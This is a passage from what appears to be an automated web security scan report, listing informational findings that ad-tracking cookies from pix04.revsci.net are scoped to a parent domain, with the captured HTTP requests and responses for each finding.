rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69OD9uDSSaM0VkQaa9E=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:22 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b2&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:22 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 19:21:21 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.197. http://pix04.revsci.net/F08747/b3/0/3/1003161/844309645.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/844309645.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCl2ESSWI1VkRja8M=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:10 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e649e&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:10 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/844309645.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXSkPATW+Mer9duzVms/XJMQ; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCl2ESSWI1VkRja8M=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:10 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e649e&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:10 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:39:09 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.198. http://pix04.revsci.net/F08747/b3/0/3/1003161/868788633.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/868788633.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPFeU+FbxIQlVNYvPseIeEiFPKEy2jX32SxfaDo4ZtI52+8kOrN2tIEatD2NFDN28McViXNICYwA3URtRQyHBfvW63RgQEvN3nTlHdbuK0MtbbnRIrYmtGmo+sIQgYnBbz1rWaD5nvETvudYWPW+YY+jVNKmPA7C4cNze3ubSyVoP/Mvzh8yqOn8T4PkKmtuqmmNSNlUcCb7AvmmX6HduXeNE8ekpJt5PJt9TPDSc5OwZKZV8wtbsuH4GB5KnTDVufMfq4A7GludS80QNWlXxhqHWE5bdrAEQ==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:17:11 GMT; Path=/
NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d6e5f77&0&&4d464cb2&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:17:11 GMT; Path=/
rtc_0=MLsvsNUvMS5jJgE8Efe6cA/gU+BBsKjEeIf8lOISRcnGovHI6UEjSeeH4ygDZPpq3+/yS+PtxMQT7DslgE+EiBMcIdm+Gd/vQ8HMUGpOgSK+Iiy2dQ4mJ3SoQqTJ6fQVFiTZ9oRHyAn8YGRiYSjj2Ay1aQ3fE6vV5I9utDq0gdZ4/kVrRmNIOysji0Wn6/0LxbFbkxJUqn7AWIp2smXVCwMrSCX++R6vBtN664sMTvtNTbZXz0uM3sNWkLQhYlIi7SQwWY0rkMmj7vgY8B8gTBxg4wiG6w5j1DmzvVr4tx5DmkYz2wgpi9jyFX3BxNhVvlXHFNzBu4s3pRGxzkoYSZsG7tdLNgzEqBJPubDyRn4Xf+c3859kMdk7ghrTmCS2c/r6TbGtxpUM45NaHIbEK6+Cm0jFU0ivCzVPvaGdh9z3gjy1aXP5qVqL4CpwQgO4GiR/u5Ro5/TlTA==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:17:11 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/868788633.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.ehow.com%252F%253F_rsiL%253D0%26DM_EOM%3D1&C=F08747 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=0105974ea67d21e1&F08747&0&4d6e5e16&0&&4d4637e7&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLsvsNUvcS5nJgFEV8O6cA+G4idxFuQPjAyWrSbmZ3Tbl2Rd84FlLVUcISRc/FsFPa8heywhNNg5oFbPl3F4dMO1sqcRu9XvUH6T+X2ToNJcKBHEUablLssaqzXvV0sN4iDF0eGzgINZcw0zRL+mPOkQo5u7ZqcIkcvVGKIHC87XbFyPcMgOVI28QjWTCBD7gxqlIHS30QpvQ23aySIZt5ZxD55Z2c2GGfqWfBB6nr8wTvbeVNSkATrp9p3laMToYhkfC7XcQCg1sRH6YdvSsYEoFIsVF5hdhhIgDfYapTcthUYv2wg5i1ihR2cqliV1Zn67wjWxNJuVi6joDXBNdhcMPCFqKzLLKTl4ZuhIeYoc9iXeucply5kFJgfG2imXDzFbc7uGwNb8HtbLXtXcaj5yx988Z002RRxTALk7uCob6xDvhIj76C4h3+AECWUFcJk3GJdmjVDlQw==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPFek+FbxIQlVNYvPseIeEiFPKES2rX32SxfaDo4ZtI52+8kOrN2tIEatD2NFDN28McViXNICZwA3URtRQyHBfvW63RgQEvN3nTlHdbuK0MtbbnRNLsfPWlzdt7bBgxNo9S4TFyvy550ZbbgnisYICpSwC4ZVzs8ocBSsdmFSlCX5nA6jhiPje8627Hz0K3hWxaqA1HRd9rrrt9zcHbeM9R+uKdbCgqxwApXYH62jxVFTAElcdrGAl7qMVW7CA4QXhx19CEtQxM6U/Rv3YPaS7SayZM56Aj; udm_0=MLvv9SEJaSpn5l6pKNOgJzc7zXFBImlqLQZYGOfvryMh7Ts3xm/ap8Mkb9Q+GVTW54epWAGkuIcUnCrzO8+Tci0xPFkCJx2C8DHxZNx6c2nnbi7v85jAMuCkI+OF8bDBOkUDIQo00ISeVp0e+nzNxCo9dICQ+0cM8d3jCrbVqYUB2pih6N/lS/5cGOjHmRRwGUrXXJdSXg507/rsbSv/Z/6Dl0AMsMYinqCkXld4aEsUrV0asKxIPtc6r7oeAqO5yb5Kde0vLODoRSR8qhds3M5iyMiTru62vLwgYXw4yGYCfSEm67p10vxu10uB39arIntwlS1xpvwAz1ZdWmket4fxBg0EoXcSyqeCp2PGL2f/TOgPaHrOLKpeSzIjxydg6XfS3RCEhfMKFw8CLW2o8Xoq0dL8bodzogQcgbYn2IwMwGgP0+Yi4K4xyZblQ4UNKVr8IsNNij9JwLk8uDYlC7f4C+YaPOgLvX+YxkIHoJXDux0LEaVRXhGxtEovknVkA4rJw9bvS9FTmnr9sum7ognAriing6ol+IJaug0V/dOvX/YJ/0JvQTyQyMtikHngFv+7JL3B1ir5SVF0vYpBUg8H+KvW1gdSc01W25zc/vqkOAFGt+SyTALHM3wwF1UfdfpizlOYveRwhZYuF/MR87KSRxbbzTeaNKFArFStQODLCsQb1xLrdk5u3YLnEgewYHreak9DY2F0zC8dcnGbd4QxKqkg9DC3UwtxXUXeDam8NDTK3hUPiLtXd6Vz+iwy8WtSrUV8imCo9dAkXme+GprvgSlQLf2z+XyfmYyg4TI6r1R1w7FavBlniDiR+OF0UTPn2uagbea3V4l1gSbPDAI90owchhwnt7BqMW8iV864i+Hmh8EzQOuB+HywqnXgWA+vKwe3+s5AmpGTXTQlckdFFLOpeMwaab7VNBe45TXTOLtHRRQTCOWtGmluPYv01cEHt/uC2TIF3R3e3Mx/SUPlJ75H/FNFRoN45pjtf7lfFU0m0QJIgPUaU+yV7tWpuMNys/dHz/cnkLFZxtozdlwpAb8Y9zSyvAquWIEpFb2bCy3GDfiOgY7Hno7mBCcVUMYPmIToNyDJFETaKXI+3Ya73xpVtSoU8p4vPKzeSHThdatgttU2rfCXllGdmb1opVkQwM1a3sboF0gDeMhdM0QUUZ0Gr8zE4OPPwv35TNzC/XgOs5UHzTBbu7jhCtwJ5LQtT/m4wdGC7/yTlk0btUiPxIsCYgM/kW2uxyOd

Response

11.199. http://pix04.revsci.net/F08747/b3/0/3/1003161/869604030.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/869604030.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzk3elPsVX+8er9duzVms/qpMm; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:26 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e64ae&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:26 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/869604030.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXSkPATW+Mer9duzVms/XJMQ; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
